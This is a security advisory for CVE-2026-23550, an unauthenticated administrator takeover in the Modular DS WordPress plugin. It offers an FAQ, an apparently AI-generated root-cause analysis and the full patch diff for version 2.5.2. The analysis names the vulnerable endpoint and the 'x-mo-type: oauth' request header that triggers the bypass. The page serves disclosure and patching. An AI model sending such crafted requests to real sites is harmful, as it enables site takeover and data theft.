What is CVE-2026-23550?

CVE-2026-23550 is a critical vulnerability in the Modular DS plugin for WordPress, affecting versions up to and including 2.5.1. It allows unauthenticated attackers to escalate privileges and log in as an administrator due to a broken oAuth implementation.

How does this vulnerability work?

The vulnerability exploits a logic flaw in the plugin’s routing system, specifically in the bindOldRoutes method. Attackers can send crafted HTTP requests to the oAuth endpoint, bypassing authentication and gaining administrative access.

Who is affected by this vulnerability?

Any WordPress site using the Modular DS plugin version 2.5.1 or earlier is at risk. Administrators should check their installed plugin version to determine if they are affected.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Modular DS plugin installed. If it is version 2.5.1 or earlier, your site is susceptible to this vulnerability.

What is the recommended fix for this vulnerability?

The recommended fix is to update the Modular DS plugin to version 2.5.2 or later, which includes a patch that resolves the broken oAuth implementation and enhances security.

What if I cannot immediately update the plugin?

If immediate updating is not possible, consider disabling the Modular DS plugin until it can be updated. This will prevent potential exploitation while you arrange for the update.

What does a CVSS score of 9.8 indicate?

A CVSS score of 9.8 indicates a critical severity level, meaning that the vulnerability can be exploited remotely without authentication. This poses a significant risk to the integrity and security of the affected WordPress site.

What are the practical risks of this vulnerability?

Successful exploitation allows attackers to gain full administrative control over the WordPress site. This can lead to unauthorized changes, data theft, or the installation of malicious software.

How does the proof of concept demonstrate the issue?

The proof of concept provides a script that sends a specially crafted HTTP request to the vulnerable oAuth endpoint, demonstrating how an attacker can exploit the vulnerability to gain administrative access without authentication.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately change all administrative passwords, review user accounts for unauthorized access, and consider restoring from a clean backup. Conduct a thorough security audit to identify any further issues.

Where can I find updates about this vulnerability?

Updates regarding CVE-2026-23550 and related vulnerabilities can be found on the official CVE database, security advisories from WordPress, and the plugin’s official website.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-23550: Modular DS <= 2.5.1 – Unauthenticated Privilege Escalation (modular-connector)

CVE ID CVE-2026-23550

Plugin modular-connector

Severity Critical (CVSS 9.8)

CWE 269

Vulnerable Version 2.5.1

Patched Version 2.5.2

Disclosed January 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-23550:
This vulnerability is an unauthenticated privilege escalation in the Modular DS WordPress plugin, versions up to and including 2.5.1. The flaw resides in the plugin’s broken oAuth implementation, allowing attackers to bypass authentication and log in as an administrator. The CVSS score of 9.8 reflects the critical severity of this remote, network-based attack requiring no user interaction.

The root cause is a logic flaw in the `bindOldRoutes` method within `modular-connector/src/app/Providers/RouteServiceProvider.php`. The vulnerable code (lines 43-57) incorrectly processes incoming HTTP requests. The function accepts a `$route` parameter and attempts to match it based on a `type` header or parameter (`x-mo-type` or `type`). When the type is `oauth`, the code binds the request to the route without performing proper authentication checks. The `findRoute` method in `modular-connector/vendor/ares/framework/src/Foundation/Routing/Router.php` (line 17) and the `match` method in `modular-connector/vendor/ares/framework/src/Foundation/Bootloader.php` (line 189) pass unfiltered user input directly to the routing logic, enabling an attacker to manipulate the route resolution.

Exploitation involves sending a crafted HTTP request to the plugin’s oAuth endpoint. An attacker sends a GET or POST request to `/wp-content/plugins/modular-connector/public/index.php` or a similar exposed routing endpoint, setting the `type` parameter to `oauth`. The request must include the necessary headers or parameters to trigger the oAuth flow, such as `x-mo-type: oauth`. The plugin’s routing system then processes this request as an authenticated oAuth callback, granting the attacker an administrative session. The attack vector is entirely network-based and requires no prior authentication.

The patch modifies the `bindOldRoutes` method signature and logic. The function no longer accepts a `$route` parameter (`public function bindOldRoutes($removeQuery = false)`). It now explicitly retrieves the route named `default` from the router (`$route = $routes->getByName(‘default’);`) and binds the request to it early. The conditional logic for processing different request types (`request`, `oauth`, `lb`) is consolidated into a single `if/else if` block, ensuring all paths undergo consistent validation. The patch also adds a default route handler in `modular-connector/src/routes/api.php` (lines 109-111) that returns a 404 error, preventing unintended route matching. The core fix prevents attackers from injecting a malicious route object or manipulating the routing process to bypass oAuth authentication.

Successful exploitation grants an unauthenticated attacker administrative privileges on the WordPress site. This allows complete control over the website, including creating and modifying users, installing and activating plugins, changing site settings, and executing arbitrary code via plugin or theme editors. The attacker can also exfiltrate sensitive data, deface the site, or establish a persistent backdoor. Given the plugin’s purpose of managing multiple websites, a compromise could potentially affect all connected sites within the Modular DS ecosystem.

Differential between vulnerable and patched code

Code Diff

--- a/modular-connector/init.php
+++ b/modular-connector/init.php
@@ -3,7 +3,7 @@
  * Plugin Name: Modular Connector
  * Plugin URI: https://modulards.com/herramienta-gestion-webs/
  * Description: Connect and manage all your WordPress websites in an easier and more efficient way. Backups, bulk updates, Uptime Monitor, statistics, security, performance, client reports and much more.
- * Version: 2.5.1
+ * Version: 2.5.2
  * License: GPL v3.0
  * License URI: https://www.gnu.org/licenses/gpl.html
  * Requires PHP: 7.4
@@ -20,7 +20,7 @@

 define('MODULAR_CONNECTOR_BASENAME', sprintf('%s/%s', basename(dirname(__FILE__)), basename(__FILE__)));
 define('MODULAR_CONNECTOR_MU_BASENAME', sprintf('0-%s.php', dirname(MODULAR_CONNECTOR_BASENAME)));
-define('MODULAR_CONNECTOR_VERSION', '2.5.1');
+define('MODULAR_CONNECTOR_VERSION', '2.5.2');
 define('MODULAR_ARES_SCHEDULE_HOOK', 'modular_connector_run_schedule');
 define('MODULAR_CONNECTOR_STORAGE_PATH', untrailingslashit(WP_CONTENT_DIR) . DIRECTORY_SEPARATOR . 'modular_storage');
 define('MODULAR_CONNECTOR_BACKUPS_PATH', untrailingslashit(WP_CONTENT_DIR) . DIRECTORY_SEPARATOR . 'modular_backups');
--- a/modular-connector/src/app/Providers/RouteServiceProvider.php
+++ b/modular-connector/src/app/Providers/RouteServiceProvider.php
@@ -43,8 +43,13 @@
      * @throws PsrContainerContainerExceptionInterface
      * @throws PsrContainerNotFoundExceptionInterface
      */
-    public function bindOldRoutes($route, $removeQuery = false)
+    public function bindOldRoutes($removeQuery = false)
     {
+        $routes = app('router')->getRoutes();
+
+        $route = $routes->getByName('default');
+        $route->bind(request());
+
         if (!HttpUtils::isDirectRequest()) {
             return $route;
         }
@@ -52,8 +57,6 @@
         $request = request();
         $type = $request->header('x-mo-type', $request->get('type'));

-        $routes = app('router')->getRoutes();
-
         if ($type === 'request') {
             $mrid = $request->header('x-mo-mrid', $request->get('mrid'));
             $modularRequest = Cache::driver('array')->get('modularRequest') ?: $this->getModularRequest($mrid);
@@ -96,9 +99,7 @@
                     $route->setParameter('modular_request', $modularRequest);
                 }
             }
-        }
-
-        if ($type === 'oauth') {
+        } else if ($type === 'oauth') {
             /**
              * @var IlluminateRoutingRoute $route
              */
@@ -110,9 +111,7 @@
             }

             $route = $route->bind($request);
-        }
-
-        if ($type === 'lb') {
+        } else if ($type === 'lb') {
             /**
              * @var IlluminateRoutingRoute $route
              */
--- a/modular-connector/src/routes/api.php
+++ b/modular-connector/src/routes/api.php
@@ -10,6 +10,7 @@
 use ModularConnectorHttpControllersWooCommerceController;
 use ModularConnectorHttpMiddlewareAuthenticateLoopback;
 use ModularConnectorDependenciesIlluminateSupportFacadesRoute;
+use function ModularConnectorDependenciesabort;

 Route::get('/oauth', [AuthController::class, 'postConfirmOauth'])
     ->name('modular-connector.oauth');
@@ -106,3 +107,7 @@
         Route::get('/woocommerce/{modular_request}', WooCommerceController::class)
             ->name('manager.woocommerce.stats');
     });
+
+Route::get('default/{request}', function () {
+    abort(404);
+})->name('default');
--- a/modular-connector/vendor/ares/framework/src/Foundation/Bootloader.php
+++ b/modular-connector/vendor/ares/framework/src/Foundation/Bootloader.php
@@ -189,7 +189,7 @@
             try {
                 // First, we need to search for the route to confirm if it exists and check if the modular request is valid.
                 $routes = $this->app->make('router')->getRoutes();
-                $route = apply_filters('ares/routes/match', $routes->match($request), false);
+                $route = apply_filters('ares/routes/match', false);
                 if (HttpUtils::isDirectRequest()) {
                     if ($route->getName() === 'wordpress') {
                         // If the route is not found, return false.
--- a/modular-connector/vendor/ares/framework/src/Foundation/Routing/Router.php
+++ b/modular-connector/vendor/ares/framework/src/Foundation/Routing/Router.php
@@ -17,7 +17,7 @@
      */
     protected function findRoute($request)
     {
-        $this->current = $route = apply_filters('ares/routes/match', $this->routes->match($request), true);
+        $this->current = $route = apply_filters('ares/routes/match', true);
         $route->setContainer($this->container);
         $this->container->instance(Route::class, $route);
         return $route;
--- a/modular-connector/vendor/composer/autoload_files.php
+++ b/modular-connector/vendor/composer/autoload_files.php
@@ -6,25 +6,25 @@
 $baseDir = dirname($vendorDir);

 return array(
-    '5a7bb63098496af4e240e58eddca59a9' => $vendorDir . '/symfony/polyfill-php80/bootstrap.php',
-    '79edd977ef0c925a03e16b7120ad9fa1' => $vendorDir . '/symfony/polyfill-mbstring/bootstrap.php',
-    'c0fd8d02f739a0d28b7049eb93a85108' => $vendorDir . '/symfony/deprecation-contracts/function.php',
-    'd50815e6b17c7a303c7b46d4b84940c9' => $vendorDir . '/illuminate/collections/helpers.php',
-    '8177eb8452b5f2def74f7a84f10909d2' => $vendorDir . '/symfony/translation/Resources/functions.php',
-    'b7eb17c71b7471b81082198d82ac2eba' => $vendorDir . '/illuminate/support/helpers.php',
-    'db9b6aa0d4216bbe4bdd6a868a1c3c1d' => $vendorDir . '/symfony/polyfill-ctype/bootstrap.php',
-    '52cfe9aa590fcc0c1694a7082506e776' => $vendorDir . '/symfony/polyfill-php73/bootstrap.php',
-    '0bb35f30d3329b99bbba5562b870bd30' => $vendorDir . '/symfony/polyfill-intl-normalizer/bootstrap.php',
-    '9e6a39e0d43293e35d548626a19914e2' => $vendorDir . '/symfony/var-dumper/Resources/functions/dump.php',
-    '295741e4046be8b88eb525c43c49c565' => $vendorDir . '/symfony/polyfill-intl-grapheme/bootstrap.php',
-    '20a7a7bcc69040dae36a2066103c03d6' => $vendorDir . '/symfony/string/Resources/functions.php',
-    'e7cce8c90104d8023b8e1924fe68dd45' => $vendorDir . '/symfony/polyfill-intl-idn/bootstrap.php',
-    '93335753ca3dd3d62447d763cb9e59fd' => $vendorDir . '/symfony/polyfill-php81/bootstrap.php',
-    '521df67d2bb70bcfd3578de97168005a' => $vendorDir . '/illuminate/events/functions.php',
-    'a588233e190377a8061b7da35424dbd1' => $vendorDir . '/opis/closure/functions.php',
-    'bf3da3d01950ea9c21c430850c71aeba' => $vendorDir . '/ralouphie/getallheaders/src/getallheaders.php',
-    '2906cc65cc6372f5dd7a3285a9685bec' => $vendorDir . '/ramsey/uuid/src/functions.php',
-    '38b9b292125d0b1d8e77711522c3454e' => $vendorDir . '/ares/framework/src/helpers.php',
-    '574554cf4c9c164b356686693c60663e' => $vendorDir . '/ares/framework/illuminate/Foundation/helpers.php',
-    '4131bf6cb9e01ae628980e80ca81c354' => $vendorDir . '/guzzlehttp/guzzle/src/functions_include.php',
+    '3be3930930d4833e9170bb96a98017ed' => $vendorDir . '/symfony/polyfill-php80/bootstrap.php',
+    '57776b6b937d151aa09700e58bc43ff7' => $vendorDir . '/symfony/polyfill-mbstring/bootstrap.php',
+    '47362306d406d3d5f750b39a76472c36' => $vendorDir . '/symfony/deprecation-contracts/function.php',
+    '5ae20ab1b22decfcdf1ec8cf5cb0c6df' => $vendorDir . '/illuminate/collections/helpers.php',
+    '5b0ac2d5c681c57f19727b3f84f240f6' => $vendorDir . '/symfony/translation/Resources/functions.php',
+    '6ecf50c74684d51e775de2f58a75568d' => $vendorDir . '/illuminate/support/helpers.php',
+    'd7477911cd049bbd22fc06886adcd76a' => $vendorDir . '/symfony/polyfill-ctype/bootstrap.php',
+    'da3333cb928bd72afb37c8655e4b0dc4' => $vendorDir . '/symfony/polyfill-php73/bootstrap.php',
+    'be46ff9416c6039edf2c9e9d0f073bc7' => $vendorDir . '/symfony/polyfill-intl-normalizer/bootstrap.php',
+    'cd924b8b8867bdf5cb30ea3d1fda7877' => $vendorDir . '/symfony/var-dumper/Resources/functions/dump.php',
+    '96e6be4dee482c433db35007e272ccb1' => $vendorDir . '/symfony/polyfill-intl-grapheme/bootstrap.php',
+    'e6d623430cf9dfede21ce0afb13fc0d5' => $vendorDir . '/symfony/string/Resources/functions.php',
+    '6595570c01f6b61275f965dd5f61dc9e' => $vendorDir . '/symfony/polyfill-intl-idn/bootstrap.php',
+    '5b10ea17a66c57c2dec9163991a14bfe' => $vendorDir . '/symfony/polyfill-php81/bootstrap.php',
+    'e9263394afb0f5bb487acaa8ed5a379c' => $vendorDir . '/illuminate/events/functions.php',
+    '2159037f38ede778c62d6f26243fd889' => $vendorDir . '/opis/closure/functions.php',
+    '96012c69e36abd148dd6e21fe7da2fca' => $vendorDir . '/ralouphie/getallheaders/src/getallheaders.php',
+    'dcf98500ad62a9796e6d807dd200c4ad' => $vendorDir . '/ramsey/uuid/src/functions.php',
+    'f0a9f602b56a7514b8a4ae31dad26396' => $vendorDir . '/ares/framework/src/helpers.php',
+    '5d00439f4bfea78f75490a2b73529178' => $vendorDir . '/ares/framework/illuminate/Foundation/helpers.php',
+    '39aca1ab5f5b45f7014527f1ffae03c8' => $vendorDir . '/guzzlehttp/guzzle/src/functions_include.php',
 );
--- a/modular-connector/vendor/composer/autoload_static.php
+++ b/modular-connector/vendor/composer/autoload_static.php
@@ -7,27 +7,27 @@
 class ComposerStaticInit20dc4b5b6916718faedab6064b350e72
 {
     public static $files = array (
-        '5a7bb63098496af4e240e58eddca59a9' => __DIR__ . '/..' . '/symfony/polyfill-php80/bootstrap.php',
-        '79edd977ef0c925a03e16b7120ad9fa1' => __DIR__ . '/..' . '/symfony/polyfill-mbstring/bootstrap.php',
-        'c0fd8d02f739a0d28b7049eb93a85108' => __DIR__ . '/..' . '/symfony/deprecation-contracts/function.php',
-        'd50815e6b17c7a303c7b46d4b84940c9' => __DIR__ . '/..' . '/illuminate/collections/helpers.php',
-        '8177eb8452b5f2def74f7a84f10909d2' => __DIR__ . '/..' . '/symfony/translation/Resources/functions.php',
-        'b7eb17c71b7471b81082198d82ac2eba' => __DIR__ . '/..' . '/illuminate/support/helpers.php',
-        'db9b6aa0d4216bbe4bdd6a868a1c3c1d' => __DIR__ . '/..' . '/symfony/polyfill-ctype/bootstrap.php',
-        '52cfe9aa590fcc0c1694a7082506e776' => __DIR__ . '/..' . '/symfony/polyfill-php73/bootstrap.php',
-        '0bb35f30d3329b99bbba5562b870bd30' => __DIR__ . '/..' . '/symfony/polyfill-intl-normalizer/bootstrap.php',
-        '9e6a39e0d43293e35d548626a19914e2' => __DIR__ . '/..' . '/symfony/var-dumper/Resources/functions/dump.php',
-        '295741e4046be8b88eb525c43c49c565' => __DIR__ . '/..' . '/symfony/polyfill-intl-grapheme/bootstrap.php',
-        '20a7a7bcc69040dae36a2066103c03d6' => __DIR__ . '/..' . '/symfony/string/Resources/functions.php',
-        'e7cce8c90104d8023b8e1924fe68dd45' => __DIR__ . '/..' . '/symfony/polyfill-intl-idn/bootstrap.php',
-        '93335753ca3dd3d62447d763cb9e59fd' => __DIR__ . '/..' . '/symfony/polyfill-php81/bootstrap.php',
-        '521df67d2bb70bcfd3578de97168005a' => __DIR__ . '/..' . '/illuminate/events/functions.php',
-        'a588233e190377a8061b7da35424dbd1' => __DIR__ . '/..' . '/opis/closure/functions.php',
-        'bf3da3d01950ea9c21c430850c71aeba' => __DIR__ . '/..' . '/ralouphie/getallheaders/src/getallheaders.php',
-        '2906cc65cc6372f5dd7a3285a9685bec' => __DIR__ . '/..' . '/ramsey/uuid/src/functions.php',
-        '38b9b292125d0b1d8e77711522c3454e' => __DIR__ . '/..' . '/ares/framework/src/helpers.php',
-        '574554cf4c9c164b356686693c60663e' => __DIR__ . '/..' . '/ares/framework/illuminate/Foundation/helpers.php',
-        '4131bf6cb9e01ae628980e80ca81c354' => __DIR__ . '/..' . '/guzzlehttp/guzzle/src/functions_include.php',
+        '3be3930930d4833e9170bb96a98017ed' => __DIR__ . '/..' . '/symfony/polyfill-php80/bootstrap.php',
+        '57776b6b937d151aa09700e58bc43ff7' => __DIR__ . '/..' . '/symfony/polyfill-mbstring/bootstrap.php',
+        '47362306d406d3d5f750b39a76472c36' => __DIR__ . '/..' . '/symfony/deprecation-contracts/function.php',
+        '5ae20ab1b22decfcdf1ec8cf5cb0c6df' => __DIR__ . '/..' . '/illuminate/collections/helpers.php',
+        '5b0ac2d5c681c57f19727b3f84f240f6' => __DIR__ . '/..' . '/symfony/translation/Resources/functions.php',
+        '6ecf50c74684d51e775de2f58a75568d' => __DIR__ . '/..' . '/illuminate/support/helpers.php',
+        'd7477911cd049bbd22fc06886adcd76a' => __DIR__ . '/..' . '/symfony/polyfill-ctype/bootstrap.php',
+        'da3333cb928bd72afb37c8655e4b0dc4' => __DIR__ . '/..' . '/symfony/polyfill-php73/bootstrap.php',
+        'be46ff9416c6039edf2c9e9d0f073bc7' => __DIR__ . '/..' . '/symfony/polyfill-intl-normalizer/bootstrap.php',
+        'cd924b8b8867bdf5cb30ea3d1fda7877' => __DIR__ . '/..' . '/symfony/var-dumper/Resources/functions/dump.php',
+        '96e6be4dee482c433db35007e272ccb1' => __DIR__ . '/..' . '/symfony/polyfill-intl-grapheme/bootstrap.php',
+        'e6d623430cf9dfede21ce0afb13fc0d5' => __DIR__ . '/..' . '/symfony/string/Resources/functions.php',
+        '6595570c01f6b61275f965dd5f61dc9e' => __DIR__ . '/..' . '/symfony/polyfill-intl-idn/bootstrap.php',
+        '5b10ea17a66c57c2dec9163991a14bfe' => __DIR__ . '/..' . '/symfony/polyfill-php81/bootstrap.php',
+        'e9263394afb0f5bb487acaa8ed5a379c' => __DIR__ . '/..' . '/illuminate/events/functions.php',
+        '2159037f38ede778c62d6f26243fd889' => __DIR__ . '/..' . '/opis/closure/functions.php',
+        '96012c69e36abd148dd6e21fe7da2fca' => __DIR__ . '/..' . '/ralouphie/getallheaders/src/getallheaders.php',
+        'dcf98500ad62a9796e6d807dd200c4ad' => __DIR__ . '/..' . '/ramsey/uuid/src/functions.php',
+        'f0a9f602b56a7514b8a4ae31dad26396' => __DIR__ . '/..' . '/ares/framework/src/helpers.php',
+        '5d00439f4bfea78f75490a2b73529178' => __DIR__ . '/..' . '/ares/framework/illuminate/Foundation/helpers.php',
+        '39aca1ab5f5b45f7014527f1ffae03c8' => __DIR__ . '/..' . '/guzzlehttp/guzzle/src/functions_include.php',
     );

     public static $prefixLengthsPsr4 = array (
--- a/modular-connector/vendor/composer/installed.php
+++ b/modular-connector/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'modular/connector',
         'pretty_version' => 'dev-master',
         'version' => 'dev-master',
-        'reference' => '94b33cc67556b45c8dc2f69ae2fd8666c2b1d535',
+        'reference' => '31b71716c4e10fe87dce8f18e026c33edf345468',
         'type' => 'wordpres-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -11,9 +11,9 @@
     ),
     'versions' => array(
         'ares/framework' => array(
-            'pretty_version' => '3.6.5',
-            'version' => '3.6.5.0',
-            'reference' => '45994befc8442250b0213cf63274c61f0e2d8c86',
+            'pretty_version' => '3.6.8',
+            'version' => '3.6.8.0',
+            'reference' => '94e71ee8ba4b29ab41bc03485533a08bf7b82e21',
             'type' => 'library',
             'install_path' => __DIR__ . '/../ares/framework',
             'aliases' => array(),
@@ -56,9 +56,9 @@
             'dev_requirement' => false,
         ),
         'graham-campbell/result-type' => array(
-            'pretty_version' => 'v1.1.3',
-            'version' => '1.1.3.0',
-            'reference' => '3ba905c11371512af9d9bdd27d99b782216b6945',
+            'pretty_version' => 'v1.1.4',
+            'version' => '1.1.4.0',
+            'reference' => 'e01f4a821471308ba86aa202fed6698b6b695e3b',
             'type' => 'library',
             'install_path' => __DIR__ . '/../graham-campbell/result-type',
             'aliases' => array(),
@@ -301,16 +301,16 @@
         'modular/connector' => array(
             'pretty_version' => 'dev-master',
             'version' => 'dev-master',
-            'reference' => '94b33cc67556b45c8dc2f69ae2fd8666c2b1d535',
+            'reference' => '31b71716c4e10fe87dce8f18e026c33edf345468',
             'type' => 'wordpres-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
             'dev_requirement' => false,
         ),
         'monolog/monolog' => array(
-            'pretty_version' => '2.10.0',
-            'version' => '2.10.0.0',
-            'reference' => '5cf826f2991858b54d5c3809bee745560a1042a7',
+            'pretty_version' => '2.11.0',
+            'version' => '2.11.0.0',
+            'reference' => '37308608e599f34a1a4845b16440047ec98a172a',
             'type' => 'library',
             'install_path' => __DIR__ . '/../monolog/monolog',
             'aliases' => array(),
@@ -341,9 +341,9 @@
             'dev_requirement' => false,
         ),
         'phpoption/phpoption' => array(
-            'pretty_version' => '1.9.4',
-            'version' => '1.9.4.0',
-            'reference' => '638a154f8d4ee6a5cfa96d6a34dfbe0cffa9566d',
+            'pretty_version' => '1.9.5',
+            'version' => '1.9.5.0',
+            'reference' => '75365b91986c2405cf5e1e012c5595cd487a98be',
             'type' => 'library',
             'install_path' => __DIR__ . '/../phpoption/phpoption',
             'aliases' => array(),
@@ -741,9 +741,9 @@
             'dev_requirement' => false,
         ),
         'vlucas/phpdotenv' => array(
-            'pretty_version' => 'v5.6.2',
-            'version' => '5.6.2.0',
-            'reference' => '24ac4c74f91ee2c193fa1aaa5c249cb0822809af',
+            'pretty_version' => 'v5.6.3',
+            'version' => '5.6.3.0',
+            'reference' => '955e7815d677a3eaa7075231212f2110983adecc',
             'type' => 'library',
             'install_path' => __DIR__ . '/../vlucas/phpdotenv',
             'aliases' => array(),
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/ErrorHandler.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/ErrorHandler.php
@@ -136,7 +136,24 @@
      */
     protected function defaultErrorLevelMap(): array
     {
-        return [E_ERROR => LogLevel::CRITICAL, E_WARNING => LogLevel::WARNING, E_PARSE => LogLevel::ALERT, E_NOTICE => LogLevel::NOTICE, E_CORE_ERROR => LogLevel::CRITICAL, E_CORE_WARNING => LogLevel::WARNING, E_COMPILE_ERROR => LogLevel::ALERT, E_COMPILE_WARNING => LogLevel::WARNING, E_USER_ERROR => LogLevel::ERROR, E_USER_WARNING => LogLevel::WARNING, E_USER_NOTICE => LogLevel::NOTICE, E_STRICT => LogLevel::NOTICE, E_RECOVERABLE_ERROR => LogLevel::ERROR, E_DEPRECATED => LogLevel::NOTICE, E_USER_DEPRECATED => LogLevel::NOTICE];
+        return [
+            E_ERROR => LogLevel::CRITICAL,
+            E_WARNING => LogLevel::WARNING,
+            E_PARSE => LogLevel::ALERT,
+            E_NOTICE => LogLevel::NOTICE,
+            E_CORE_ERROR => LogLevel::CRITICAL,
+            E_CORE_WARNING => LogLevel::WARNING,
+            E_COMPILE_ERROR => LogLevel::ALERT,
+            E_COMPILE_WARNING => LogLevel::WARNING,
+            E_USER_ERROR => LogLevel::ERROR,
+            E_USER_WARNING => LogLevel::WARNING,
+            E_USER_NOTICE => LogLevel::NOTICE,
+            2048 => LogLevel::NOTICE,
+            // E_STRICT
+            E_RECOVERABLE_ERROR => LogLevel::ERROR,
+            E_DEPRECATED => LogLevel::NOTICE,
+            E_USER_DEPRECATED => LogLevel::NOTICE,
+        ];
     }
     /**
      * @phpstan-return never
@@ -235,7 +252,7 @@
                 return 'E_USER_WARNING';
             case E_USER_NOTICE:
                 return 'E_USER_NOTICE';
-            case E_STRICT:
+            case 2048:
                 return 'E_STRICT';
             case E_RECOVERABLE_ERROR:
                 return 'E_RECOVERABLE_ERROR';
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Formatter/MongoDBFormatter.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Formatter/MongoDBFormatter.php
@@ -25,8 +25,6 @@
     private $exceptionTraceAsString;
     /** @var int */
     private $maxNestingLevel;
-    /** @var bool */
-    private $isLegacyMongoExt;
     /**
      * @param int  $maxNestingLevel        0 means infinite nesting, the $record itself is level 1, $record['context'] is 2
      * @param bool $exceptionTraceAsString set to false to log exception traces as a sub documents instead of strings
@@ -35,7 +33,6 @@
     {
         $this->maxNestingLevel = max($maxNestingLevel, 0);
         $this->exceptionTraceAsString = $exceptionTraceAsString;
-        $this->isLegacyMongoExt = extension_loaded('mongodb') && version_compare((string) phpversion('mongodb'), '1.1.9', '<=');
     }
     /**
      * {@inheritDoc}
@@ -108,27 +105,6 @@
     }
     protected function formatDate(DateTimeInterface $value, int $nestingLevel): UTCDateTime
     {
-        if ($this->isLegacyMongoExt) {
-            return $this->legacyGetMongoDbDateTime($value);
-        }
-        return $this->getMongoDbDateTime($value);
-    }
-    private function getMongoDbDateTime(DateTimeInterface $value): UTCDateTime
-    {
         return new UTCDateTime((int) floor((float) $value->format('U.u') * 1000));
     }
-    /**
-     * This is needed to support MongoDB Driver v1.19 and below
-     *
-     * See https://github.com/mongodb/mongo-php-driver/issues/426
-     *
-     * It can probably be removed in 2.1 or later once MongoDB's 1.2 is released and widely adopted
-     */
-    private function legacyGetMongoDbDateTime(DateTimeInterface $value): UTCDateTime
-    {
-        $milliseconds = floor((float) $value->format('U.u') * 1000);
-        $milliseconds = PHP_INT_SIZE == 8 ? (int) $milliseconds : (string) $milliseconds;
-        // @phpstan-ignore-next-line
-        return new UTCDateTime($milliseconds);
-    }
 }
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/Curl/Util.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/Curl/Util.php
@@ -37,14 +37,14 @@
                 $curlErrno = curl_errno($ch);
                 if (false === in_array($curlErrno, self::$retriableErrorCodes, true) || !$retries) {
                     $curlError = curl_error($ch);
-                    if ($closeAfterDone) {
+                    if (PHP_VERSION_ID < 80000 && $closeAfterDone) {
                         curl_close($ch);
                     }
                     throw new RuntimeException(sprintf('Curl error (code %d): %s', $curlErrno, $curlError));
                 }
                 continue;
             }
-            if ($closeAfterDone) {
+            if (PHP_VERSION_ID < 80000 && $closeAfterDone) {
                 curl_close($ch);
             }
             return $curlResponse;
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/MongoDBHandler.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/MongoDBHandler.php
@@ -11,12 +11,13 @@
  */
 namespace ModularConnectorDependenciesMonologHandler;

+use ModularConnectorDependenciesMongoDBClient;
+use ModularConnectorDependenciesMongoDBCollection;
 use MongoDBDriverBulkWrite;
 use MongoDBDriverManager;
-use ModularConnectorDependenciesMongoDBClient;
-use ModularConnectorDependenciesMonologLogger;
 use ModularConnectorDependenciesMonologFormatterFormatterInterface;
 use ModularConnectorDependenciesMonologFormatterMongoDBFormatter;
+use ModularConnectorDependenciesMonologLogger;
 /**
  * Logs to a MongoDB database.
  *
@@ -32,12 +33,12 @@
  */
 class MongoDBHandler extends AbstractProcessingHandler
 {
-    /** @var MongoDBCollection */
+    /** @var Collection */
     private $collection;
     /** @var Client|Manager */
     private $manager;
-    /** @var string */
-    private $namespace;
+    /** @var string|null */
+    private $namespace = null;
     /**
      * Constructor.
      *
@@ -51,7 +52,7 @@
             throw new InvalidArgumentException('MongoDBClient or MongoDBDriverManager instance required');
         }
         if ($mongodb instanceof Client) {
-            $this->collection = $mongodb->selectCollection($database, $collection);
+            $this->collection = method_exists($mongodb, 'getCollection') ? $mongodb->getCollection($database, $collection) : $mongodb->selectCollection($database, $collection);
         } else {
             $this->manager = $mongodb;
             $this->namespace = $database . '.' . $collection;
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/RotatingFileHandler.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/RotatingFileHandler.php
@@ -141,7 +141,7 @@
                 // suppress errors here as unlink() might fail if two processes
                 // are cleaning up/rotating at the same time
                 set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline): bool {
-                    return false;
+                    return true;
                 });
                 unlink($file);
                 restore_error_handler();
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/TelegramBotHandler.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/TelegramBotHandler.php
@@ -185,6 +185,9 @@
     }
     protected function sendCurl(string $message): void
     {
+        if ('' === trim($message)) {
+            return;
+        }
         $ch = curl_init();
         $url = self::BOT_API . $this->apiKey . '/SendMessage';
         curl_setopt($ch, CURLOPT_URL, $url);
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Processor/GitProcessor.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Processor/GitProcessor.php
@@ -57,7 +57,7 @@
         if (self::$cache) {
             return self::$cache;
         }
-        $branches = `git branch -v --no-abbrev`;
+        $branches = shell_exec('git branch -v --no-abbrev');
         if ($branches && preg_match('{^* (.+?)s+([a-f0-9]{40})(?:s|$)}m', $branches, $matches)) {
             return self::$cache = ['branch' => $matches[1], 'commit' => $matches[2]];
         }
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Processor/MercurialProcessor.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Processor/MercurialProcessor.php
@@ -56,7 +56,7 @@
         if (self::$cache) {
             return self::$cache;
         }
-        $result = explode(' ', trim(`hg id -nb`));
+        $result = explode(' ', trim((string) shell_exec('hg id -nb')));
         if (count($result) >= 3) {
             return self::$cache = ['branch' => $result[1], 'revision' => $result[2]];
         }
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/SignalHandler.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/SignalHandler.php
@@ -70,6 +70,7 @@
      */
     public function handleSignal(int $signo, $siginfo = null): void
     {
+        /** @var array<int, string> $signals */
         static $signals = [];
         if (!$signals && extension_loaded('pcntl')) {
             $pcntl = new ReflectionExtension('pcntl');
--- a/modular-connector/vendor/scoper-autoload.php
+++ b/modular-connector/vendor/scoper-autoload.php
@@ -14,7 +14,7 @@
     // Restore the backup and ensure the excluded files are properly marked as loaded
